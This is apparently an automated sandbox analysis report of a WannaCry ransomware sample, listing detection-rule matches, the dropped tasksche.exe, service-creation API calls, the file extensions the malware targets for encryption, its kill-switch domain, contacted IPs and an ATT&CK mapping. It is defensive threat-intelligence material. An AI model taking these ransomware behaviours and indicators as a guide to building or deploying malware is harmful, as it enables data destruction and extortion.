Source: 00000001.00000000.353230807.0000000000710000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 00000001.00000002.618307902.0000000000710000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 00000000.00000000.350051549.0000000000710000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: C:\Windows\tasksche.exe, type: DROPPED	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: C:\Windows\tasksche.exe, type: DROPPED	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: C:\Windows\tasksche.exe, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware

Source: C:\Users\user\Desktop\stN592INV6.exe

File created: C:\WINDOWS\tasksche.exe

Jump to behavior

Source: C:\Windows\tasksche.exe	Code function: 2_2_00406C40	2_2_00406C40
Source: C:\Windows\tasksche.exe	Code function: 2_2_00402A76	2_2_00402A76
Source: C:\Windows\tasksche.exe	Code function: 2_2_00402E7E	2_2_00402E7E
Source: C:\Windows\tasksche.exe	Code function: 2_2_0040350F	2_2_0040350F
Source: C:\Windows\tasksche.exe	Code function: 2_2_00404C19	2_2_00404C19
Source: C:\Windows\tasksche.exe	Code function: 2_2_0040541F	2_2_0040541F
Source: C:\Windows\tasksche.exe	Code function: 2_2_00403797	2_2_00403797
Source: C:\Windows\tasksche.exe	Code function: 2_2_004043B7	2_2_004043B7
Source: C:\Windows\tasksche.exe	Code function: 2_2_004031BC	2_2_004031BC

Source: stN592INV6.exe	Static PE information: Resource name: R type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: tasksche.exe.0.dr	Static PE information: Resource name: XIA type: Zip archive data, at least v2.0 to extract, compression method=deflate

Source: Joe Sandbox View

Dropped File: C:\Windows\tasksche.exe 2584E1521065E45EC3C17767C065429038FC6291C091097EA8B22C8A502C41DD

Source: stN592INV6.exe

ReversingLabs: Detection: 100%

Source: C:\Users\user\Desktop\stN592INV6.exe

File read: C:\Users\user\Desktop\stN592INV6.exe

Jump to behavior

Source: C:\Users\user\Desktop\stN592INV6.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\stN592INV6.exe C:\Users\user\Desktop\stN592INV6.exe
Source: unknown	Process created: C:\Users\user\Desktop\stN592INV6.exe C:\Users\user\Desktop\stN592INV6.exe -m security
Source: C:\Users\user\Desktop\stN592INV6.exe	Process created: C:\Windows\tasksche.exe C:\WINDOWS\tasksche.exe /i
Source: C:\Users\user\Desktop\stN592INV6.exe	Process created: C:\Windows\tasksche.exe C:\WINDOWS\tasksche.exe /i	Jump to behavior

Source: C:\Users\user\Desktop\stN592INV6.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: classification engine

Classification label: mal100.rans.troj.expl.evad.winEXE@4/1@2/100

Source: C:\Users\user\Desktop\stN592INV6.exe	Code function: sprintf,OpenSCManagerA,InternetCloseHandle,CreateServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,	0_2_00407C40
Source: C:\Users\user\Desktop\stN592INV6.exe	Code function: sprintf,OpenSCManagerA,InternetCloseHandle,CreateServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,	1_2_00407C40
Source: C:\Windows\tasksche.exe	Code function: OpenSCManagerA,OpenServiceA,StartServiceA,CloseServiceHandle,sprintf,CreateServiceA,StartServiceA,CloseServiceHandle,CloseServiceHandle,	2_2_00401CE8

Source: C:\Users\user\Desktop\stN592INV6.exe	Code function: 0_2_00408090 GetModuleFileNameA,__p___argc,OpenSCManagerA,InternetCloseHandle,OpenServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherA,		0_2_00408090
Source: C:\Users\user\Desktop\stN592INV6.exe	Code function: 1_2_00408090 GetModuleFileNameA,__p___argc,OpenSCManagerA,InternetCloseHandle,OpenServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherA,		1_2_00408090

Source: C:\Users\user\Desktop\stN592INV6.exe

Code function: 0_2_00407C40 sprintf,OpenSCManagerA,InternetCloseHandle,CreateServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,

0_2_00407C40

Source: C:\Users\user\Desktop\stN592INV6.exe

Code function: 0_2_00407CE0 InternetCloseHandle,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,FindResourceA,LoadResource,LockResource,SizeofResource,sprintf,sprintf,sprintf,MoveFileExA,CreateFileA,WriteFile,FindCloseChangeNotification,CreateProcessA,CloseHandle,CloseHandle,

0_2_00407CE0

Source: tasksche.exe, 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmp, stN592INV6.exe, tasksche.exe.0.dr

Binary or memory string: @.der.pfx.key.crt.csr.p12.pem.odt.ott.sxw.stw.uot.3ds.max.3dm.ods.ots.sxc.stc.dif.slk.wb2.odp.otp.sxd.std.uop.odg.otg.sxm.mml.lay.lay6.asc.sqlite3.sqlitedb.sql.accdb.mdb.db.dbf.odb.frm.myd.myi.ibd.mdf.ldf.sln.suo.cs.c.cpp.pas.h.asm.js.cmd.bat.ps1.vbs.vb.pl.dip.dch.sch.brd.jsp.php.asp.rb.java.jar.class.sh.mp3.wav.swf.fla.wmv.mpg.vob.mpeg.asf.avi.mov.mp4.3gp.mkv.3g2.flv.wma.mid.m3u.m4u.djvu.svg.ai.psd.nef.tiff.tif.cgm.raw.gif.png.bmp.jpg.jpeg.vcd.iso.backup.zip.rar.7z.gz.tgz.tar.bak.tbk.bz2.PAQ.ARC.aes.gpg.vmx.vmdk.vdi.sldm.sldx.sti.sxi.602.hwp.snt.onetoc2.dwg.pdf.wk1.wks.123.rtf.csv.txt.vsdx.vsd.edb.eml.msg.ost.pst.potm.potx.ppam.ppsx.ppsm.pps.pot.pptm.pptx.ppt.xltm.xltx.xlc.xlm.xlt.xlw.xlsb.xlsm.xlsx.xls.dotx.dotm.dot.docm.docb.docx.docWANACRY!%s\%sCloseHandleDeleteFileWMoveFileExWMoveFileWReadFileWriteFileCreateFileWkernel32.dll

Source: C:\Users\user\Desktop\stN592INV6.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\stN592INV6.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\stN592INV6.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\stN592INV6.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: stN592INV6.exe

Static file information: File size 3751936 > 1048576

Source: stN592INV6.exe

Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x362000

Source: C:\Windows\tasksche.exe	Code function: 2_2_00407710 push eax; ret		2_2_0040773E
Source: C:\Windows\tasksche.exe	Code function: 2_2_004076C8 push eax; ret		2_2_004076E6

Source: stN592INV6.exe

Static PE information: section name: metjdhr

Source: C:\Windows\tasksche.exe

Code function: 2_2_00401A45 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

2_2_00401A45

Persistence and Installation Behavior

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Users\user\Desktop\stN592INV6.exe

Executable created and started: C:\WINDOWS\tasksche.exe

Jump to behavior

Source: C:\Users\user\Desktop\stN592INV6.exe

File created: C:\Windows\tasksche.exe

Jump to dropped file

Source: C:\Users\user\Desktop\stN592INV6.exe

File created: C:\Windows\tasksche.exe

Jump to dropped file

Source: C:\Users\user\Desktop\stN592INV6.exe

Code function: 0_2_00407C40 sprintf,OpenSCManagerA,InternetCloseHandle,CreateServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,

0_2_00407C40

Source: C:\Users\user\Desktop\stN592INV6.exe TID: 6076	Thread sleep count: 99 > 30			Jump to behavior
Source: C:\Users\user\Desktop\stN592INV6.exe TID: 6088	Thread sleep count: 115 > 30			Jump to behavior

Source: C:\Users\user\Desktop\stN592INV6.exe

Last function: Thread delayed

Source: stN592INV6.exe, 00000000.00000002.359491609.0000000000ACE000.00000004.00000020.00020000.00000000.sdmp, stN592INV6.exe, 00000000.00000002.359491609.0000000000B02000.00000004.00000020.00020000.00000000.sdmp, stN592INV6.exe, 00000001.00000002.619089050.0000000000C12000.00000004.00000020.00020000.00000000.sdmp, stN592INV6.exe, 00000001.00000002.619089050.0000000000C43000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Windows\tasksche.exe

Code function: 2_2_00401A45 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

2_2_00401A45

Source: C:\Windows\tasksche.exe

Code function: 2_2_004029CC free,GetProcessHeap,HeapFree,

2_2_004029CC

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	2 Service Execution	4 Windows Service	4 Windows Service	12 Masquerading	1 Input Capture	1 Network Share Discovery	Remote Services	1 Input Capture	Exfiltration Over Other Network Medium	22 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 Data Encrypted for Impact
Default Accounts	1 Native API	Boot or Logon Initialization Scripts	1 Process Injection	1 Virtualization/Sandbox Evasion	LSASS Memory	111 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	Exfiltration Over Bluetooth	11 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 Process Injection	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	2 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Obfuscated Files or Information	NTDS	1 Remote System Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	3 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Software Packing	LSA Secrets	1 System Information Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label
stN592INV6.exe	100%	ReversingLabs	Win32.Ransomware.WannaCry
stN592INV6.exe	100%	Avira	TR/AD.WannaCry.sewvt
stN592INV6.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Windows\tasksche.exe	100%	Avira	TR/AD.WannaCry.sewvt
C:\Windows\tasksche.exe	100%	Joe Sandbox ML
C:\Windows\tasksche.exe	98%	ReversingLabs	Win32.Ransomware.WannaCry

Unpacked PE Files

Source	Detection	Scanner	Label	Download
2.2.tasksche.exe.400000.0.unpack	100%	Avira	TR/AD.WannaCry.sewvt	Download File
0.2.stN592INV6.exe.7100a4.1.unpack	100%	Avira	TR/AD.WannaCry.sewvt	Download File
0.0.stN592INV6.exe.7100a4.1.unpack	100%	Avira	TR/AD.WannaCry.sewvt	Download File
1.0.stN592INV6.exe.7100a4.1.unpack	100%	Avira	TR/AD.WannaCry.sewvt	Download File
0.2.stN592INV6.exe.400000.0.unpack	100%	Avira	TR/AD.WannaCry.sewvt	Download File
0.0.stN592INV6.exe.400000.0.unpack	100%	Avira	TR/AD.WannaCry.sewvt	Download File
1.2.stN592INV6.exe.24fc8c8.9.unpack	100%	Avira	TR/Ransom.Gen	Download File
1.0.stN592INV6.exe.400000.0.unpack	100%	Avira	TR/AD.WannaCry.sewvt	Download File
2.0.tasksche.exe.400000.0.unpack	100%	Avira	TR/AD.WannaCry.sewvt	Download File
1.2.stN592INV6.exe.7100a4.1.unpack	100%	Avira	TR/AD.WannaCry.sewvt	Download File
1.2.stN592INV6.exe.252e96c.6.unpack	100%	Avira	TR/AD.WannaCry.sewvt	Download File
1.2.stN592INV6.exe.1fdc084.5.unpack	100%	Avira	TR/Ransom.Gen	Download File
1.2.stN592INV6.exe.200e128.3.unpack	100%	Avira	TR/AD.WannaCry.sewvt	Download File
1.2.stN592INV6.exe.400000.0.unpack	100%	Avira	TR/AD.WannaCry.sewvt	Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com	100%	URL Reputation	malware
https://www.kryptoslogic.com	0%	URL Reputation	safe
http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/	100%	URL Reputation	malware
http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/22www.iuqerfsodp9ifjaposdfjhgosurijfaewrwer	100%	URL Reputation	malware
http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comJ	0%	URL Reputation	safe
http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/&h	100%	Avira URL Cloud	malware
http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comx86)	0%	Avira URL Cloud	safe
http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comTERNAME	0%	Avira URL Cloud	safe
http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/2h	100%	Avira URL Cloud	malware
http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/L	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com	104.16.173.80	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/	true	URL Reputation: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com	stN592INV6.exe	true	URL Reputation: malware	unknown
http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comx86)	stN592INV6.exe, 00000001.00000002.619089050.0000000000C07000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	low
https://www.kryptoslogic.com	stN592INV6.exe, 00000000.00000002.359491609.0000000000B02000.00000004.00000020.00020000.00000000.sdmp	true	URL Reputation: safe	unknown
http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/&h	stN592INV6.exe, 00000000.00000002.359491609.0000000000ACE000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/L	stN592INV6.exe, 00000000.00000002.359491609.0000000000ACE000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/22www.iuqerfsodp9ifjaposdfjhgosurijfaewrwer	stN592INV6.exe, 00000000.00000002.359491609.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, stN592INV6.exe, 00000000.00000002.359491609.0000000000ACE000.00000004.00000020.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comTERNAME	stN592INV6.exe, 00000001.00000002.619089050.0000000000C07000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/2h	stN592INV6.exe, 00000000.00000002.359491609.0000000000ACE000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comJ	stN592INV6.exe, 00000001.00000002.618210719.000000000019C000.00000004.00000010.00020000.00000000.sdmp	true	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
107.165.99.30	unknown	United States	18779	EGIHOSTINGUS	true
101.159.172.21	unknown	China	9394	CTTNETChinaTieTongTelecommunicationsCorporationCN	false
115.175.192.97	unknown	China	7497	CSTNET-AS-APComputerNetworkInformationCenterCN	false
109.14.118.118	unknown	France	15557	LDCOMNETFR	false
107.165.99.38	unknown	United States	18779	EGIHOSTINGUS	true
107.165.99.37	unknown	United States	18779	EGIHOSTINGUS	true
107.165.99.36	unknown	United States	18779	EGIHOSTINGUS	true
107.165.99.35	unknown	United States	18779	EGIHOSTINGUS	true
107.165.99.34	unknown	United States	18779	EGIHOSTINGUS	true
100.150.236.25	unknown	United States	21928	T-MOBILE-AS21928US	false
107.165.99.33	unknown	United States	18779	EGIHOSTINGUS	true
107.165.99.32	unknown	United States	18779	EGIHOSTINGUS	true
107.165.99.31	unknown	United States	18779	EGIHOSTINGUS	true
202.159.55.243	unknown	Indonesia	9340	INDONET-AS-APINDOInternetPTID	false
6.78.103.79	unknown	United States	1464	DNIC-ASBLK-01464-01465US	false
79.17.98.235	unknown	Italy	3269	ASN-IBSNAZIT	false
35.30.149.109	unknown	United States	36375	UMICH-AS-5US	false
100.17.242.81	unknown	United States	701	UUNETUS	false
110.193.28.163	unknown	China	9394	CTTNETChinaTieTongTelecommunicationsCorporationCN	false
107.165.99.29	unknown	United States	18779	EGIHOSTINGUS	true
94.50.20.26	unknown	Russian Federation	12389	ROSTELECOM-ASRU	false
107.165.99.28	unknown	United States	18779	EGIHOSTINGUS	true
106.37.240.93	unknown	China	4847	CNIX-APChinaNetworksInter-ExchangeCN	false
165.36.48.73	unknown	United States	37053	RSAWEB-ASZA	false
208.141.91.81	unknown	United States	3561	CENTURYLINK-LEGACY-SAVVISUS	false
19.230.119.198	unknown	United States	3	MIT-GATEWAYSUS	false
63.218.23.184	unknown	United States	3491	BTN-ASNUS	false
141.72.227.114	unknown	Germany	553	BELWUEBelWue-KoordinationEU	false
104.23.8.55	unknown	United States	13335	CLOUDFLARENETUS	false
44.103.39.120	unknown	United States	64218	MIDSNETUS	false
125.116.173.102	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
107.165.99.27	unknown	United States	18779	EGIHOSTINGUS	true
45.162.96.222	unknown	Brazil	268506	DelhaBarbosadeCarvalho-MEBR	false
186.78.10.86	unknown	Chile	7418	TELEFONICACHILESACL	false
107.165.99.26	unknown	United States	18779	EGIHOSTINGUS	true
23.235.144.243	unknown	United States	132839	POWERLINE-AS-APPOWERLINEDATACENTERHK	false
107.165.99.25	unknown	United States	18779	EGIHOSTINGUS	true
107.165.99.24	unknown	United States	18779	EGIHOSTINGUS	true
116.183.194.174	unknown	China	137539	UNICOM-HARBIN-IDCChinaUnicomCN	false
107.165.99.23	unknown	United States	18779	EGIHOSTINGUS	true
168.116.192.0	unknown	United States	36026	AS-CHI-CORPUS	false
107.165.99.22	unknown	United States	18779	EGIHOSTINGUS	true
107.165.99.21	unknown	United States	18779	EGIHOSTINGUS	true
82.18.231.170	unknown	United Kingdom	5089	NTLGB	false
183.6.2.144	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
107.165.99.20	unknown	United States	18779	EGIHOSTINGUS	true
71.56.230.138	unknown	United States	7922	COMCAST-7922US	false
162.93.150.225	unknown	United States	6949	CHARLES-SCHWABUS	false
158.231.98.142	unknown	France	36351	SOFTLAYERUS	false
36.219.187.50	unknown	China	9394	CTTNETChinaTieTongTelecommunicationsCorporationCN	false
140.121.180.180	unknown	Taiwan; Republic of China (ROC)	38847	NCHU-AS-TWNationalChungHsingUniversityTW	false
107.165.99.19	unknown	United States	18779	EGIHOSTINGUS	true
107.165.99.18	unknown	United States	18779	EGIHOSTINGUS	true
132.6.47.46	unknown	United States	385	AFCONC-BLOCK1-ASUS	false
96.155.150.196	unknown	United States	7922	COMCAST-7922US	false
107.165.99.17	unknown	United States	18779	EGIHOSTINGUS	true
151.86.198.27	unknown	Italy	8217	ASN-ENIIT	false
134.48.98.26	unknown	United States	1736	MU-ASUS	false
174.48.76.49	unknown	United States	7922	COMCAST-7922US	false
179.84.122.232	unknown	Brazil	26599	TELEFONICABRASILSABR	false
54.35.48.14	unknown	United States	14618	AMAZON-AESUS	false
75.204.201.85	unknown	United States	22394	CELLCOUS	false
196.123.124.117	unknown	Morocco	36925	ASMediMA	false
74.51.185.24	unknown	United States	30055	CROSSLAKECOMMUNICATIONSUS	false
169.6.177.201	unknown	United States	203	CENTURYLINK-LEGACY-LVLT-203US	false
105.23.110.116	unknown	Mauritius	37100	SEACOM-ASMU	false
107.165.99.52	unknown	United States	18779	EGIHOSTINGUS	true
107.165.99.51	unknown	United States	18779	EGIHOSTINGUS	true
107.165.99.50	unknown	United States	18779	EGIHOSTINGUS	true
133.249.8.151	unknown	Japan	17947	S-UTOPIASAKURAKCSCorporationJP	false
8.227.163.150	unknown	United States	396238	FAIRLAWNGIG-NETUS	false
150.22.248.39	unknown	Japan	2907	SINET-ASResearchOrganizationofInformationandSystemsN	false
116.139.36.17	unknown	China	4837	CHINA169-BACKBONECHINAUNICOMChina169BackboneCN	false
193.208.55.224	unknown	Finland	1759	TSF-IP-CORETeliaFinlandOyjEU	false
107.152.120.142	unknown	United States	7782	ALSK-7782US	false
107.165.99.59	unknown	United States	18779	EGIHOSTINGUS	true
107.165.99.58	unknown	United States	18779	EGIHOSTINGUS	true
139.164.186.167	unknown	Norway	29695	ALTIBOX_ASNorwayNO	false
107.165.99.57	unknown	United States	18779	EGIHOSTINGUS	true
107.165.99.56	unknown	United States	18779	EGIHOSTINGUS	true

Private

IP
192.168.2.148
192.168.2.149
192.168.2.146
192.168.2.147
192.168.2.140
192.168.2.141
192.168.2.144
192.168.2.145
192.168.2.142
192.168.2.143
192.168.2.159
192.168.2.157
192.168.2.158
192.168.2.151
192.168.2.152
192.168.2.150
192.168.2.155
192.168.2.156
192.168.2.153
192.168.2.154

General Information

Joe Sandbox Version:	37.1.0 Beryl
Analysis ID:	860906
Start date and time:	2023-05-08 05:33:51 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 25s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	stN592INV6.exe
Original Sample Name:	2023-05-07_31510bd9b6f5c297c64492ab86aacaa1_wannacry.exe
Detection:	MAL
Classification:	mal100.rans.troj.expl.evad.winEXE@4/1@2/100
EGA Information:	Failed
HDC Information:	Successful, ratio: 99.4% (good quality ratio 90.1%) Quality average: 76.7% Quality standard deviation: 32.6%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: stN592INV6.exe

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

⊘No context

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com	Fn0ldcwYp5.exe	Get hash	malicious	Wannacry	Browse	104.16.173.80
	fRUk5kt31I.exe	Get hash	malicious	Wannacry	Browse	104.16.173.80
	xiQJ4AR6kS.exe	Get hash	malicious	Virut, Wannacry	Browse	104.17.244.81
	Qy6oOsX62L.exe	Get hash	malicious	Virut, Wannacry	Browse	104.17.244.81
	LX5kd65cMq.exe	Get hash	malicious	Wannacry	Browse	104.16.173.80
	Win32.Wannacry.exe	Get hash	malicious	Wannacry	Browse	104.17.244.81
	http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com	Get hash	malicious	Unknown	Browse	104.16.173.80
	Ni7LJQgu5C.dll	Get hash	malicious	Wannacry	Browse	104.16.173.80
	9hFrDoD0UH.dll	Get hash	malicious	Wannacry	Browse	104.16.173.80
	zMxKF1sZ6K.dll	Get hash	malicious	Wannacry	Browse	104.16.173.80
	mbXvGlj2dR.dll	Get hash	malicious	Wannacry	Browse	104.16.173.80
	8YjgkMEKt4.exe	Get hash	malicious	Wannacry	Browse	104.16.173.80
	w7pN61jwPu.exe	Get hash	malicious	Wannacry	Browse	104.17.244.81
	9lCJpl7Hsk.dll	Get hash	malicious	Wannacry	Browse	104.17.244.81
	qvV34ruRr1.exe	Get hash	malicious	Wannacry	Browse	104.17.244.81
	GzOXKM2kuA.dll	Get hash	malicious	Wannacry	Browse	104.17.244.81
	KIsgbS7n3c.exe	Get hash	malicious	Wannacry	Browse	104.16.173.80
	MSNRf9dZ63.exe	Get hash	malicious	Wannacry	Browse	104.16.173.80
	1jGr1mY0jf.exe	Get hash	malicious	Wannacry	Browse	104.17.244.81
	RE8WkQYyxM.exe	Get hash	malicious	Wannacry	Browse	104.16.173.80

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
EGIHOSTINGUS	Tifzk5S9Dp.elf	Get hash	malicious	Mirai	Browse	107.187.145.87
	PNUGTuZahh.elf	Get hash	malicious	Mirai, Moobot	Browse	192.177.179.39
	DHL_2017128_Receipt_Document,pdf.exe	Get hash	malicious	FormBook, GuLoader	Browse	45.38.47.103
	DHL_2017128_Receipt_Document,pdf.exe	Get hash	malicious	FormBook, GuLoader	Browse	45.38.47.103
	Order_confirmation_is_attached.exe	Get hash	malicious	DBatLoader, FormBook	Browse	166.88.175.35
	DHL_2017128_Receipt_Document,pdf.exe	Get hash	malicious	FormBook, GuLoader	Browse	45.38.47.103
	tMisSkMPIB.elf	Get hash	malicious	Unknown	Browse	142.253.6.87
	2nkKFdYrrU.elf	Get hash	malicious	Mirai	Browse	23.230.101.4
	cujr1d9Bx1.elf	Get hash	malicious	Mirai, Moobot	Browse	107.187.9.96
	gpzisBB3c6.elf	Get hash	malicious	Mirai	Browse	136.0.81.166
	b3astmode.x86.elf	Get hash	malicious	Mirai	Browse	104.164.245.6
	jklarm-20230428-0950.elf	Get hash	malicious	Mirai	Browse	166.88.8.150
	2eO25tyqpJ.elf	Get hash	malicious	Mirai	Browse	104.165.179.61
	x86.elf	Get hash	malicious	Mirai	Browse	107.164.205.115
	cOvvOLLVKg.elf	Get hash	malicious	Mirai	Browse	45.39.166.146
	RH7j5wEmQg.elf	Get hash	malicious	Mirai	Browse	104.253.157.72
	XKrr6G6f5E.elf	Get hash	malicious	Mirai	Browse	166.93.129.89
	KMqGoudziq.elf	Get hash	malicious	Unknown	Browse	107.164.241.10
	W47rLMtUVo.elf	Get hash	malicious	Mirai	Browse	107.164.204.25
	zF0csZp14G.elf	Get hash	malicious	Mirai	Browse	172.120.223.168

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Windows\tasksche.exe	onq54JS79W.exe	Get hash	malicious	Wannacry	Browse
	mbXvGlj2dR.dll	Get hash	malicious	Wannacry	Browse
	MSNRf9dZ63.exe	Get hash	malicious	Wannacry	Browse
	7Qu8thR7WW.dll	Get hash	malicious	Wannacry, Virut	Browse
	MSmReFKunQ.dll	Get hash	malicious	Wannacry	Browse
	kXpnLUmuU2.dll	Get hash	malicious	Wannacry	Browse
	TigrxMihsc.dll	Get hash	malicious	Wannacry	Browse
	iTQzi9bir4.dll	Get hash	malicious	Wannacry	Browse
	5nuyzrvshp.dll	Get hash	malicious	Virut, Wannacry	Browse
